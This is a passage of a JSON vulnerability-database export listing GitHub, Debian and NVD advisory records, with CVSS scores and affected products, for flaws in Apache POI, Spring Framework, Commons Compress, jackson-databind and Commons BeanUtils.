["CVE-2019-12086"], "modified": "2019-07-16T00:00:00", "id": "SMNTC-109227", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/109227", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "github": [{"lastseen": "2023-05-27T15:16:05", "description": "Apache POI in versions prior to release 3.17 are vulnerable to Denial of Service Attacks:\n - Infinite Loops while parsing crafted WMF, EMF, MSG and macros (POI bugs 61338 and 61294)\n - Out of Memory Exceptions while parsing crafted DOC, PPT and XLS (POI bugs 52372 and 61295)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-01-14T19:18:22", "type": "github", "title": "Denial of Service in Apache POI", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12626"], "modified": "2023-01-28T05:00:55", "id": "GHSA-523C-XH4G-MH5M", "href": "https://github.com/advisories/GHSA-523c-xh4g-mh5m", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-05-27T11:12:57", "description": "Directory traversal vulnerability in Pivotal Spring Framework 3.x before 3.2.9 and 4.0 before 4.0.5 allows remote attackers to read arbitrary files via a crafted URL.", "cvss3": {}, "published": "2022-05-14T00:56:29", "type": "github", "title": "Improper Limitation of a Pathname to a Restricted Directory in Spring Framework", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3578"], "modified": "2023-01-27T05:02:11", "id": "GHSA-RHCG-RWHX-QJ3J", "href": "https://github.com/advisories/GHSA-rhcg-rwhx-qj3j", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-05-27T15:16:30", "description": "When reading a specially crafted ZIP archive, the read method of Apache Commons Compress 1.7 to 1.17's ZipArchiveInputStream can fail to return the correct EOF indication after the end of the stream has been reached. When combined with a java.io.InputStreamReader this can lead to an infinite stream, which can be used to mount a denial of service attack against services that use Compress' zip package.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2018-10-19T16:41:27", "type": "github", "title": "Moderate severity vulnerability that affects org.apache.commons:commons-compress", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11771"], "modified": "2023-02-01T05:03:50", "id": "GHSA-HRMR-F5M6-M9PQ", "href": "https://github.com/advisories/GHSA-hrmr-f5m6-m9pq", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-05-27T15:16:21", "description": "A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.0.0 through 2.9.10. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has the commons-dbcp (1.4) jar in the classpath, and an attacker can find an RMI service endpoint to access, it is possible to make the service execute a malicious payload. This issue exists because of org.apache.commons.dbcp.datasources.SharedPoolDataSource and org.apache.commons.dbcp.datasources.PerUserPoolDataSource mishandling.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-10-28T20:51:15", "type": "github", "title": "Polymorphic Typing in FasterXML jackson-databind", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16942"], "modified": "2023-01-29T05:07:30", "id": "GHSA-MX7P-6679-8G3Q", "href": "https://github.com/advisories/GHSA-mx7p-6679-8g3q", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T15:16:21", "description": "A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.0.0 through 2.9.10. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has the p6spy (3.8.6) jar in the classpath, and an attacker can find an RMI service endpoint to access, it is possible to make the service execute a malicious payload. This issue exists because of com.p6spy.engine.spy.P6DataSource mishandling.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-11-13T00:32:27", "type": "github", "title": "Polymorphic typing issue", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16943"], "modified": "2023-01-29T05:07:30", "id": "GHSA-FMMC-742Q-JG75", "href": "https://github.com/advisories/GHSA-fmmc-742q-jg75", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T15:16:25", "description": "A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x before 2.9.9. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint, the service has the mysql-connector-java jar (8.0.14 or earlier) in the classpath, and an attacker can host a crafted MySQL server reachable by the victim, an attacker can send a crafted JSON message that allows them to read arbitrary local files on the server. This occurs because of missing com.mysql.cj.jdbc.admin.MiniAdmin validation.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-05-23T09:32:24", "type": "github", "title": "Information exposure in FasterXML jackson-databind", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-12086"], "modified": "2023-02-01T05:02:00", "id": "GHSA-5WW9-J83M-Q7QX", "href": "https://github.com/advisories/GHSA-5ww9-j83m-q7qx", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-05-27T11:13:56", "description": "Apache Commons BeanUtils, as distributed in lib/commons-beanutils-1.8.0.jar in Apache Struts 1.x through 1.3.10 and in other products requiring commons-beanutils through 1.9.2, does not suppress the class property, which allows remote attackers to \"manipulate\" the ClassLoader and execute arbitrary code via the class parameter, as demonstrated by the passing of this parameter to the getClass method of the ActionForm object in Struts 1.", "cvss3": {}, "published": "2020-06-10T23:38:01", "type": "github", "title": "Arbitrary code execution in Apache Commons BeanUtils", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114"], "modified": "2023-02-15T20:07:03", "id": "GHSA-P66X-2CV9-QQ3V", "href": "https://github.com/advisories/GHSA-p66x-2cv9-qq3v", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debiancve": [{"lastseen": "2023-05-27T15:13:49", "description": "Apache POI in versions prior to release 3.17 are vulnerable to Denial of Service Attacks: 1) Infinite Loops while parsing crafted WMF, EMF, MSG and macros (POI bugs 61338 and 61294), and 2) Out of Memory Exceptions while parsing crafted DOC, PPT and XLS (POI bugs 52372 and 61295).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-01-29T17:29:00", "type": "debiancve", "title": "CVE-2017-12626", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12626"], "modified": "2018-01-29T17:29:00", "id": "DEBIANCVE:CVE-2017-12626", "href": "https://security-tracker.debian.org/tracker/CVE-2017-12626", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-05-27T15:14:10", "description": "Directory traversal vulnerability in Pivotal Spring Framework 3.x before 3.2.9 and 4.0 before 4.0.5 allows remote attackers to read arbitrary files via a crafted URL.", "cvss3": {}, "published": "2015-02-19T20:59:00", "type": "debiancve", "title": "CVE-2014-3578", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3578"], "modified": "2015-02-19T20:59:00", "id": "DEBIANCVE:CVE-2014-3578", "href": "https://security-tracker.debian.org/tracker/CVE-2014-3578", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-05-27T15:13:52", "description": "When reading a specially crafted ZIP archive, the read method of Apache Commons Compress 1.7 to 1.17's ZipArchiveInputStream can fail to return the correct EOF indication after the end of the stream has been reached. When combined with a java.io.InputStreamReader this can lead to an infinite stream, which can be used to mount a denial of service attack against services that use Compress' zip package.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2018-08-16T15:29:00", "type": "debiancve", "title": "CVE-2018-11771", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11771"], "modified": "2018-08-16T15:29:00", "id": "DEBIANCVE:CVE-2018-11771", "href": "https://security-tracker.debian.org/tracker/CVE-2018-11771", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-05-27T15:13:37", "description": "A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.0.0 through 2.9.10. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has the commons-dbcp (1.4) jar in the classpath, and an attacker can find an RMI service endpoint to access, it is possible to make the service execute a malicious payload. This issue exists because of org.apache.commons.dbcp.datasources.SharedPoolDataSource and org.apache.commons.dbcp.datasources.PerUserPoolDataSource mishandling.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-10-01T17:15:00", "type": "debiancve", "title": "CVE-2019-16942", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16942"], "modified": "2019-10-01T17:15:00", "id": "DEBIANCVE:CVE-2019-16942", "href": "https://security-tracker.debian.org/tracker/CVE-2019-16942", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T15:13:37", "description": "A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.0.0 through 2.9.10. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has the p6spy (3.8.6) jar in the classpath, and an attacker can find an RMI service endpoint to access, it is possible to make the service execute a malicious payload. This issue exists because of com.p6spy.engine.spy.P6DataSource mishandling.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-10-01T17:15:00", "type": "debiancve", "title": "CVE-2019-16943", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16943"], "modified": "2019-10-01T17:15:00", "id": "DEBIANCVE:CVE-2019-16943", "href": "https://security-tracker.debian.org/tracker/CVE-2019-16943", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T15:13:37", "description": "A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x before 2.9.9. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint, the service has the mysql-connector-java jar (8.0.14 or earlier) in the classpath, and an attacker can host a crafted MySQL server reachable by the victim, an attacker can send a crafted JSON message that allows them to read arbitrary local files on the server. This occurs because of missing com.mysql.cj.jdbc.admin.MiniAdmin validation.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-05-17T17:29:00", "type": "debiancve", "title": "CVE-2019-12086", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-12086"], "modified": "2019-05-17T17:29:00", "id": "DEBIANCVE:CVE-2019-12086", "href": "https://security-tracker.debian.org/tracker/CVE-2019-12086", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "cve": [{"lastseen": "2023-05-27T14:34:28", "description": "Apache POI in versions prior to release 3.17 are vulnerable to Denial of Service Attacks: 1) Infinite Loops while parsing crafted WMF, EMF, MSG and macros (POI bugs 61338 and 61294), and 2) Out of Memory Exceptions while parsing crafted DOC, PPT and XLS (POI bugs 52372 and 61295).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-01-29T17:29:00", "type": "cve", "title": "CVE-2017-12626", "cwe": ["CWE-835"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12626"], "modified": "2021-06-14T18:15:00", "cpe": [], "id": "CVE-2017-12626", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-12626", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": []}, {"lastseen": "2023-05-27T10:12:31", "description": "Directory traversal vulnerability in Pivotal Spring Framework 3.x before 3.2.9 and 4.0 before 4.0.5 allows remote attackers to read arbitrary files via a crafted URL.", "cvss3": {}, "published": "2015-02-19T20:59:00", "type": "cve", "title": "CVE-2014-3578", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3578"], "modified": "2019-07-14T00:15:00", "cpe": [], "id": "CVE-2014-3578", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3578", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2023-05-27T14:27:10", "description": "When reading a specially crafted ZIP archive, the read method of Apache Commons Compress 1.7 to 1.17's ZipArchiveInputStream can fail to return the correct EOF indication after the end of the stream has been reached. When combined with a java.io.InputStreamReader this can lead to an infinite stream, which can be used to mount a denial of service attack against services that use Compress' zip package.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2018-08-16T15:29:00", "type": "cve", "title": "CVE-2018-11771", "cwe": ["CWE-835"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11771"], "modified": "2022-04-18T17:32:00", "cpe": ["cpe:/a:oracle:weblogic_server:14.1.1.0.0", "cpe:/a:apache:commons_compress:1.17.0"], "id": "CVE-2018-11771", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-11771", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:oracle:weblogic_server:14.1.1.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:commons_compress:1.17.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:36:33", "description": "A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.0.0 through 2.9.10. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has the commons-dbcp (1.4) jar in the classpath, and an attacker can find an RMI service endpoint to access, it is possible to make the service execute a malicious payload. This issue exists because of org.apache.commons.dbcp.datasources.SharedPoolDataSource and org.apache.commons.dbcp.datasources.PerUserPoolDataSource mishandling.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-10-01T17:15:00", "type": "cve", "title": "CVE-2019-16942", "cwe": ["CWE-502"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16942"], "modified": "2022-10-29T02:32:00", "cpe": ["cpe:/a:oracle:primavera_gateway:19.12.0", "cpe:/a:oracle:global_lifecycle_management_nextgen_oui_framework:12.2.1.3.0", "cpe:/o:debian:debian_linux:8.0", "cpe:/a:oracle:banking_platform:2.5.0", "cpe:/a:redhat:jboss_enterprise_application_platform:7.2.0", "cpe:/a:netapp:oncommand_api_services:-", "cpe:/o:fedoraproject:fedora:30", "cpe:/a:netapp:steelstore_cloud_integrated_storage:-", "cpe:/a:oracle:banking_platform:2.7.0", "cpe:/a:oracle:primavera_unifier:18.8", "cpe:/a:oracle:primavera_gateway:17.12.6", "cpe:/a:oracle:siebel_ui_framework:20.6", "cpe:/a:oracle:webcenter_sites:12.2.1.4.0", "cpe:/o:debian:debian_linux:9.0", "cpe:/a:oracle:weblogic_server:12.2.1.4.0", "cpe:/a:oracle:webcenter_portal:12.2.1.4.0", "cpe:/a:oracle:goldengate_application_adapters:19.1.0.0.0", "cpe:/a:oracle:jd_edwards_enterpriseone_tools:9.2", "cpe:/a:oracle:database_server:18c", "cpe:/a:oracle:banking_platform:2.6.1", "cpe:/a:oracle:weblogic_server:12.2.1.3.0", "cpe:/o:debian:debian_linux:10.0", "cpe:/a:oracle:banking_platform:2.4.0", "cpe:/a:oracle:webcenter_sites:12.2.1.3.0", "cpe:/a:oracle:siebel_ui_framework:20.5", "cpe:/a:oracle:banking_platform:2.9.0", "cpe:/a:oracle:jd_edwards_enterpriseone_orchestrator:9.2", "cpe:/a:oracle:communications_billing_and_revenue_management:12.0.0.3.0", "cpe:/a:oracle:database_server:19c", "cpe:/a:oracle:siebel_engineering_-_installer_\\&_deployment:2.20.5", "cpe:/a:oracle:retail_merchandising_system:16.0.3", "cpe:/a:netapp:oncommand_workflow_automation:-", "cpe:/a:oracle:primavera_unifier:17.12", 